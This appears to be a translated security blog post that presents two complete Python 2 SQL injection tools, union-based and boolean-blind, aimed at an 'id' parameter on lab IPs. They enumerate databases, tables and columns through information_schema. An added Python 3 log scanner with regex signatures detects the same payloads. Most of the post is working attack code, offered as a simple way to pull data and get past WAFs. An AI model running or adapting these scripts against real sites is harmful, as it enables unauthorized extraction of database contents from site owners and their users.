0x01 Preface
I have been thinking about writing an automated injection tool that does not need to be complicated, but can pull database information in the simplest and most direct way, and can get past defenses by using a user-defined payload.
0x02 SQL Injection Tool
A. Union query
Union select is the simplest to implement, and error-based injection works in basically the same way. The main flow is: get all database names, then pick a database; list all tables in that database, then pick a table; finally query all column names in that table.
Code details (a Python 2 script):
```python
#!/usr/bin/env python
# _*_ coding:utf-8 _*_
# Python 2: print statement, raw_input and urllib.urlencode.
import requests
import urllib
import re

values = {}


def get(url, values):
    # Send the GET request and pull out every value wrapped in the qwe~ ... ~qwe
    # markers that concat(0x7177657E, ..., 0x7E717765) adds to the response.
    data = urllib.urlencode(values)
    geturl = url + '?' + data
    response = requests.get(geturl)
    result = response.content
    find_list = re.findall(r"qwe~(.+?)~qwe", result)
    # Returns an empty list (not None) when nothing matched, so callers can iterate.
    return find_list


def get_database_name(url):
    values['id'] = "1 and 1=2 union select 1,concat(0x7177657E,schema_name,0x7E717765) from INFORMATION_SCHEMA.SCHEMATA"
    name_list = get(url, values)
    print 'The databases:'
    for i in name_list:
        print i + " ",
    print "\n"


def table_name(url):
    database_name = raw_input('please input your database:')
    values['id'] = "1 union select 1,concat(0x7177657E,table_name,0x7E717765) from information_schema.tables where table_schema=" + "'" + database_name + "'"
    name_list = get(url, values)
    print 'The table is :'
    for i in name_list:
        print i + " ",
    print "\n"


def column_name(url):
    table_name = raw_input('please input your table:')
    values['id'] = "1 union select 1,concat(0x7177657E,column_name,0x7E717765) from information_schema.columns where table_name=" + "'" + table_name + "'"
    name_list = get(url, values)
    print 'The column is :'
    for i in name_list:
        print i + " ",


if __name__ == '__main__':
    url = 'http://192.168.106.130/config/sql.php'
    get_database_name(url)
    table_name(url)
    column_name(url)
```
Result of running the script (shown as an image in the original post):
B. Boolean-based blind injection
Based on a GET-type Boolean blind injection, you can write a simple injection script in the same spirit.
The flow is: get the length of each table name, then the table name itself; then get the length and name of each column.
```python
#!/usr/bin/env python
# _*_ coding:utf-8 _*_
# Python 2 script. Every probe is a true/false question: the page contains the
# string 'qwertyasd' only when the injected condition holds.
import requests
import urllib
import time

start_time = time.time()


def database_length(url):
    values = {}
    for i in range(1, 100):
        values['id'] = "1 and (select length(database()))=%s" % i
        data = urllib.urlencode(values)
        geturl = url + '?' + data
        response = requests.get(geturl)
        if response.content.find('qwertyasd') > 0:
            return i


def database_name(url):
    payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
    values = {}
    databasename = ''
    aa = database_length(url)
    for i in range(1, aa + 1):
        for payload in payloads:
            values['id'] = "1 and ascii(substring(database(),%s,1))=%s " % (i, ord(payload))
            data = urllib.urlencode(values)
            geturl = url + '?' + data
            response = requests.get(geturl)
            if response.content.find('qwertyasd') > 0:
                databasename += payload
    return databasename
# print database_name('http://192.168.125.129/config/sql.php')


def table_count(url, database):
    values = {}
    for i in range(1, 100):
        values['id'] = "1 and (select count(table_name) from information_schema.tables where table_schema=" + "'" + database + "')" + "=%s" % i
        data = urllib.urlencode(values)
        geturl = url + '?' + data
        response = requests.get(geturl)
        if response.content.find('qwertyasd') > 0:
            return i


def table_length(url, a, database):
    values = {}
    for i in range(1, 100):
        values['id'] = "1 and (select length(table_name) from information_schema.tables where table_schema=" + "'" + database + "'" + " limit %s,1)=%s" % (a, i)
        data = urllib.urlencode(values)
        geturl = url + '?' + data
        response = requests.get(geturl)
        if response.content.find('qwertyasd') > 0:
            return i


def table_name(url, database):
    payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
    values = {}
    table_name = []
    bb = table_count(url, database)
    for i in range(0, bb + 1):
        user = ''
        cc = table_length(url, i, database)
        if cc is None:
            break
        # substring() positions are 1-based, so start at 1 rather than 0.
        for j in range(1, cc + 1):
            for payload in payloads:
                values['id'] = "1 and ascii(substring((select table_name from information_schema.tables where table_schema=" + "'" + database + "'" + " limit %s,1),%s,1))=%s " % (i, j, ord(payload))
                data = urllib.urlencode(values)
                geturl = url + '?' + data
                response = requests.get(geturl)
                if response.content.find('qwertyasd') > 0:
                    user += payload
                    # print payload
        table_name.append(user)
    return table_name
# print table_name('http://192.168.125.129/config/sql.php', 'test')


def column_count(url, table_name):
    values = {}
    for i in range(100):
        values['id'] = "1 and (select count(column_name) from information_schema.columns where table_name=" + "'" + table_name + "'" + ")=%s" % i
        data = urllib.urlencode(values)
        geturl = url + '?' + data
        response = requests.get(geturl)
        if response.content.find('qwertyasd') > 0:
            return i


def column_length(num, url, table_name):
    values = {}
    for i in range(1, 100):
        limit = " limit %s,1)=%s" % (num, i)
        values['id'] = "1 and (select length(column_name) from information_schema.columns where table_name=" + "'" + table_name + "'" + limit
        data = urllib.urlencode(values)
        geturl = url + '?' + data
        response = requests.get(geturl)
        if response.content.find('qwertyasd') > 0:
            return i


def column_name(url, table_name):
    payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
    values = {}
    column_name = []
    dd = column_count(url, table_name)
    for i in range(0, dd + 1):
        user = ''
        bb = column_length(i, url, table_name)
        if bb is None:
            break
        for j in range(1, bb + 1):
            for payload in payloads:
                limit = " limit %s,1),%s,1))=%s" % (i, j, ord(payload))
                values['id'] = "1 and ascii(substring((select column_name from information_schema.columns where table_name=" + "'" + table_name + "'" + limit
                data = urllib.urlencode(values)
                geturl = url + '?' + data
                response = requests.get(geturl)
                if response.content.find('qwertyasd') > 0:
                    user += payload
        column_name.append(user)
    return column_name
# print column_name('http://192.168.125.129/config/sql.php', 'admin')


if __name__ == "__main__":
    url = 'http://192.168.125.129/config/sql.php'
    databasename = database_name(url)
    print "The current database:" + databasename
    database = raw_input("Please input your databasename: ")
    tables = table_name(url, database)
    print database + " have the tables:",
    print tables
    for table in tables:
        print table + " have the columns:"
        print column_name(url, table)
    print 'Use for: %d second' % (time.time() - start_time)
```
Result of running the script (shown as an image in the original post):
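Seen from the defender's side, both scripts above leave very recognisable traces in the web server's access log. The following Python 3 script is an added example, not part of the original post: the log lines are constructed to mimic the union payload and two blind probes, and the signature names are my own.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not from the original post). Line 2 mimics the
# union-select payload, lines 3 and 4 two boolean-blind character probes.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /config/sql.php?id=1 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /config/sql.php?id=1+and+1%3D2+union+select+1%2Cconcat%280x7177657E%2Cschema_name%2C0x7E717765%29+from+INFORMATION_SCHEMA.SCHEMATA HTTP/1.1" 200 640
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /config/sql.php?id=1+and+ascii%28substring%28database%28%29%2C1%2C1%29%29%3D116+ HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /config/sql.php?id=1+and+ascii%28substring%28database%28%29%2C1%2C1%29%29%3D117+ HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /config/sql.php?id=42 HTTP/1.1" 200 512
"""

# Client IP, then the request target taken from the quoted request line.
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Signature names are mine. Each matches one technique from the scripts above,
# applied to the URL-decoded parameter value so %28 / + encoding cannot hide it:
# UNION SELECT against information_schema, the hex-wrapped marker string given
# to concat(), and the ascii(substring(...)) boolean oracle.
SIGNATURES = {
    "union_information_schema": re.compile(r"union\s+select\b.*information_schema", re.I),
    "hex_marker_concat": re.compile(r"concat\(\s*0x[0-9a-f]+", re.I),
    "boolean_char_oracle": re.compile(r"ascii\(\s*substring\(", re.I),
}


def classify_query(query):
    """Return the set of signature names that fire on one raw query string."""
    hits = set()
    for vals in parse_qs(query, keep_blank_values=True).values():
        for decoded in vals:  # parse_qs already percent- and plus-decodes
            hits.update(name for name, rx in SIGNATURES.items() if rx.search(decoded))
    return hits


def scan_log(text):
    """Map client IP -> Counter of signature hits over all of its requests."""
    report = {}
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        hits = classify_query(urlsplit(target).query)
        if hits:
            report.setdefault(ip, Counter()).update(hits)
    return report
```

The per-client counters are what matter for the blind variant: it needs dozens of near-identical requests per recovered character, so even a loose signature that fires repeatedly from one address is a strong signal.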
0x03 END
This simple SQL injection script shows how little code it takes to pull data out of a database. It leaves plenty of room for extension, and it only covers the simplest way of retrieving data while bypassing a WAF.
About me: a network security enthusiast dedicated to sharing original, high-quality practical content. You are welcome to follow my personal WeChat official account, Bypass--, for more articles.